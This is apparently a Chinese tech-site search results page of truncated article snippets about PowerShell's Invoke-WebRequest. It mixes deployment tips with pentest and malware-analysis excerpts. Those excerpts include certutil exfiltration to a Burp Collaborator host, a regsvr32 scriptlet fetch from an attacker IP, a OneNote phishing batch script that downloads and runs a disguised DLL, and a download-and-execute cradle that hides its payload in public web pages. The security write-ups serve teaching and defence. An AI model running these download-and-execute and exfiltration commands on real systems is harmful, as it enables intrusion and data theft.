首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

使用PowerShell自动部署ASP.NetCore程序到IIS

创建一个网站并使用这个应用程序池 接下来要创建一个应用程序池,名称为TestApp New-Item -path IIS:\AppPools\TestApp 把应用程序池的.Net版本设置为托管代码...部署到IIS的关键命令,知道了这些就可以来写一个完整自动部署脚本了。...以部署ZKEACMS为例,创建一个名为ZKEACMS.ps1的文件,并将以下代码粘贴到文件中保存。.../ZKEACMS.ps1 或者可以直接鼠标右键该脚本文件,然后选择菜单中的使用 PowerShell 运行 如果你的脚本在网络上,可以直接在控制台中使用以下脚本来运行而不用下载它,例如可以使用以下脚本来在线安装...ZKEACMS: @powershell -NoProfile -ExecutionPolicy unrestricted -Command "&([scriptblock]::Create((Invoke-WebRequest

3.4K170
您找到你想要的搜索结果了吗?
是的
没有找到

powershell下载文件的姿势你研究过吗?

在渗透测试中,在正常的传输通道被禁止,我们时常会剑走偏锋,通过一些特殊的方法来进行文件的传输。这篇文章将会描述使用 PowerShell 下载文件的三种方法,并评估它们的优缺点。...1.Invoke-WebRequest 说到使用 PowerShell 下载文件,最先想到的就是 Invoke-WebRequest 命令。...缺点 使用这个命令下载文件的速度很慢。我观察到 HTTP 响应流先全部缓存到了内存中,一旦文件全部传输完毕,文件就会内存中一下子转移到磁盘中。...结论 当你需要在多个请求保留 Cookie(例如下载文件之前的 HTTP 表单验证),那么这个命令会很有用。 这种方法很适合用来下载文件,但是如果你对下载速度有要求,那肯定会有更好的选择。...工作方式为异步下载文件,并且用于同步下载文件也有十分优异的表现。还有一个BitsAdmin 工具使用的也是这个后台智能传输服务。 ? ? ?

8K01

命令执行SQL盲注回显外带方式

certutil -urlcache -split -f http://***.burpcollaborator.net powershell (Invoke-WebRequest -Uri "http...Burp -> Burp Collaborator client Project options -> Misc -> Run health check 如遇安全防护也可以去尝试下@倾旋师傅“Regsvr32...ole对象”文中提到的方法,通过修改脚本文件内容来外带不同命令的执行结果,如:查看当前权限、进程/服务、文件和目录及下载文件等。...scriptlet> wmic process call create "regsvr32 /s /n /u /i:http://192.168.1.120:8888/down.txt scrobj.dll" 文件下载脚本...模块浏览器:https://docs.microsoft.com/zh-cn/powershell/module/ 文末总结: 遇到这种回显命令执行或SQL盲注漏洞,我们可以先去看一下目标主机是否能够出网

2K10

提前内置一些排障工具到Windows系统大有好处

用procmon 左侧选System进程或业务进程,选择后点“view → Lower Pane View → Dlls (Ctrl+D)”,在下方会显示.sys、.dll procexp查看Privileges...explorer的dump日志(任务管理器 → 详细信息 → 找到未响应的explorer.exe右击点"创建转储文件")以及网络报文,如果资源管理器卡到不足以收集转储文件和网络报文,想办法收集内存转储文件...(①需提前配置pagefile 30G,太小可能不足以生成充分信息的.dmp文件;②收集,需要在母机上注入nmi中断,触发Windows系统主动蓝屏并生成dump文件,过程中耐心等待不要人为干预机器状态直到恢复正常...,把c:\windows\memory.dmp的.7z压缩包提供过来) 其次,需要收集网络报文,步骤: Step1:微软网站上下载Network Monitor(确认选取目标机器对应平台的安装包)...的wget,powershell的wget实际是这个命令的简写invoke-webrequest 因为出现问题的时候powershell用不了,所以得准备一个cmd命令能用的下载工具,就是wget.exe

33660

ATT&CK矩阵的攻与防

比如执行,下载,-bypass参数来匹配恶意行为,或者是直接套用微软的powershell语言限制模式,当然,这几种模式没有优劣之分,我们红军需要的是用已知的技术解决方案满足企业的安全需求,我们防守方的优势在于攻击者对于我们安全防线水位的未知...做一个简单的总结,攻击者有哪些常见执行exe的方法以及变种呢(仅针对windows) 后缀替换(这名字取得很不专业) 比如用ps1,bat,vbs,dll,hta等文件 语言脚本 常见的比如aspx,php...,你7zip进程起的进程,不让执行,当然,这很考验企业的基础设施 白+黑 就执行exe来说,我们出了通过双击,cmd运行以外,还可以存在如下运行方式 利用pcalua Pcalua -m -a axgg.exe...能够下载文件,但是我很少看见师傅用这个命令,Invoke-webrequest powershell.exe Invoke-webrequest -uri http://192.168.1.28:1456.../test.txt -o test.txt 而我们的Invoke-webrequest ==》 iwr powershell.exe iwr -uri http://192.168.1.28:1456/

78620

微软揭露针对以色列的 POLONIUM 组织攻击活动

CreepyDrive  CreepyDrive 利用 OneDrive 进行 C&C 通信,样本具备上传下载文件的基本功能。...data.txt 文件指示恶意程序要执行的任务,主要是三个分支。 Upload 响应中为 Upload ,触发该分支。还需要包含两个信息:要上传的本地文件路径、攻击者自定义的远程文件名。...Download 响应中为 Download ,触发该分支。...Execute 未响应任何指令,将进入该分支。响应中可以包含要执行的命令数组或先前下载文件文件路径。攻击者也可以使用单命令与文件路径的组合。...△CreepySnail PowerShell 代码  公共工具的使用  POLONIUM 通过 OneDrive 下载了一个辅助程序 plink,这是一种常见的自动化交互式 SSH 工具。

1.1K20

Exceptionless - .Net Core开源日志框架

它将收集的信息组织成简单的可操作数据,这将有助于您的应用程序变得无异常。最重要的是,它是开源的!...大概意思就是我的电脑同时安装了.NET 4.0 和.NET 4.5或更高版本,这导致加密协议的默认值为 SSLv3和 TLSv1,而Powershell需要使用 Tls12才能正常使用 Invoke-WebRequest...Powershell脚本中要下载的是什么文件,自己单独先把文件下载好放在它指定的位置就可以了,我就是这么干的。。...不过我是因为Powershell这个下载太慢了) OK,重新执行 Start.bat,可以正常下载,也启动了ElasticSearch和Kibana ?...Exceptionless注册用户 这里跟前面使用官网服务是一样的,注册用户,新建项目,获得Api密钥 ? 4.

1.6K40

在Windows系统上的Linux容器

在Windows上运行Docker,只需要一个很小的Linux内核和用户空间来承载容器进程。这正是LinuxKit工具包的设计初衷——创建安全的、精简的、可移植的Linux子系统。...安装Docker和LinuxKit 只需要在PowerShell中运行以下命令(具有管理员权限),就可以使用由LinuxKit构建的预览体验版了: $progressPreference = 'silentlyContinue...' mkdir "$Env:ProgramFiles\Linux Containers” Invoke-WebRequest -UseBasicParsing -OutFile linuxkit.zip...譬如,在Windows系统上的Docker,将使Windows 服务器上的Docker企业版和可视化管理界面(依赖某些Linux独占的组件)的设置步骤变得更加简单。...更多资源 下载Docker for Windows 10和Docker for Windows Serve 了解有关Docker企业版的更多信息 加入“在Windows上使用Docker容器和LinuxKit

4.8K60

干货 | Certutil在渗透中的利用和详解

certutil下载文件 一般我最常使用的certutil的功能就是在cmd环境下下载文件,因为certutil是windows自带的exe,所以在使用的时候会比其他exe或者vbs更加方便。...但是因为在下载文件的过程中也会创建进程,所以也遭到了各大杀软的拦截。...一般使用certutil下载文件的命令为 certutil -urlcache -split -f http://ip/artifact.exe 这里介绍一下参数 •-f 覆盖现有文件。...后面跟要下载文件 url。•-split 保存到文件值的命令行选项。加了的话就可以下载到当前路径,不加就下载到了默认路径。•-URLCache 显示或删除URL缓存条目。值的命令行选项。...内存加载 这里我在本地实验因为环境变量的原因报错,这里还是粗略的写一下大致实现过程 首先修改powershell策略为可执行脚本 下载powershell混淆框架并执行 Import-Module .

1.7K20

dotnet-install 脚本参考

他们 CLI 构建包下载 ZIP/tarball 文件,然后继续将其安装在默认位置或由-InstallDir|--install-dir. 默认情况下,安装脚本会下载 SDK 并进行安装。...他们只是下载压缩的二进制文件并将它们复制到一个文件夹中。如果您希望更新注册表项值,请使用 .NET 安装程序。... 5.0 版本开始可用。 当使用除版本之外的任何版本,该version参数会覆盖该channel参数latest。 默认值为LTS。...如果您更喜欢自己安装或下载它,它还会显示二进制文件的位置。 -FeedCredential|--feed-credential 用作附加到 Azure 源的查询字符串。...该global.json文件必须有一个值sdk:version。 -NoCdn|--no-cdn 禁用Azure 内容交付网络 (CDN) 下载并直接使用未缓存的源。

1.5K20

如何利用oneNote钓鱼?

往下拖的时候,发现了里面有几张图片的文件头和文件尾的16进制数。文件里应该是有图片。拖到后面,发现了一段powershell命令。直接复制出来。...@echo off powershell Invoke-WebRequest -URI https://xxxxx.org/aswyw/01.gif -OutFile C:\programdata\putty.jpg...rundll32 C:\programdata\putty.jpg,Wind exit 这里的内容主要就两句了,web上去下载文件到C:\programdata\putty.jpg,然后用rundll32...@echo off start https://www.onenote.com/ powershell Invoke-WebRequest -URI https://xxx.org/aswyw/01.gif...所以只要用户点击了,我们能执行cmd里的命令,就不要去调powershell了,可以尝试找一下白程序去下载文件然后执行等等思路,这里就不细说,仅仅是一个抛砖引玉,欢迎师傅们跟我交流。

85430

干货 | Certutil在渗透中的利用和详解

certutil下载文件 一般我最常使用的certutil的功能就是在cmd环境下下载文件,因为certutil是windows自带的exe,所以在使用的时候会比其他exe或者vbs更加方便。...但是因为在下载文件的过程中也会创建进程,所以也遭到了各大杀软的拦截。...一般使用certutil下载文件的命令为 certutil -urlcache -split -f http://ip/artifact.exe 这里介绍一下参数 •-f 覆盖现有文件。...后面跟要下载文件 url。•-split 保存到文件值的命令行选项。加了的话就可以下载到当前路径,不加就下载到了默认路径。•-URLCache 显示或删除URL缓存条目。值的命令行选项。...下载powershell混淆框架并执行 Import-Module .\Invoke-CradleCrafter.ps1Invoke-CradleCrafter ?

5.2K61

应急响应工具之科来技术交流版

时间线我们可以看出,自 2019 年 3 月 6 号的驱动人生木马后门新增了 “文件攻击技术”,并于 2019 年 4 月 4 日被发现直接驻留在内存中,进行挖矿。...“文件攻击” 是指恶意程序文件没有直接落地到目标系统的磁盘空间的攻击手法,一般情况下,“文件攻击”会把攻击载荷直接载入到内存空间中执行,或者依附于合法的系统进程来进行恶意操作。...现代的 “文件攻击” 大多是基于 Powershell 的整个攻击链、攻击步骤完全无文件,恶意代码依附于可信的系统进程。综上我们可以知道:“文件攻击” 极其善于躲避检测、对抗杀软。...我们可以通信角度来看 ”驱动人生木马后门的文件攻击“ 首先,我们可以查看数据流,驱动人生木马,有个比较明显的通信特征,会以 Get 方式回传被控主机信息。 ?...下载文件亦会产生通信,所以针对其不变的通信特征,我们可以对其进行监测。 ? ?

1.4K50

Payload多种隐藏方法

第一种,在百度中传输payload 首先建立如下c2配置文件,贴上部分代码,官方wiki介绍在这里:https://www.cobaltstrike.com/help-malleable-c2 http-get...然后我们让payload的响应数据出现在如下html中: ? 而这个html正是我copy的正常百度的: ? 目的也是为了让我们的payload隐藏在看似就是百度给的响应包中。...而我们的目的就是在这些白名单网站中植入payload,让受害者机器下载执行。 本来想以github测试,发现墙是真的厚。...然后我们以powershell为例,进行如下步骤: 1、访问植入payload的页面(Invoke-WebRequest) 2、获取payload(Regex) 3、执行payload(Invoke-expression...) 这里直接给出payload: $data = Invoke-WebRequest -Uri https://www.yuque.com/docs/share/444cd7ff-72aa-4066-945e

1.8K10
领券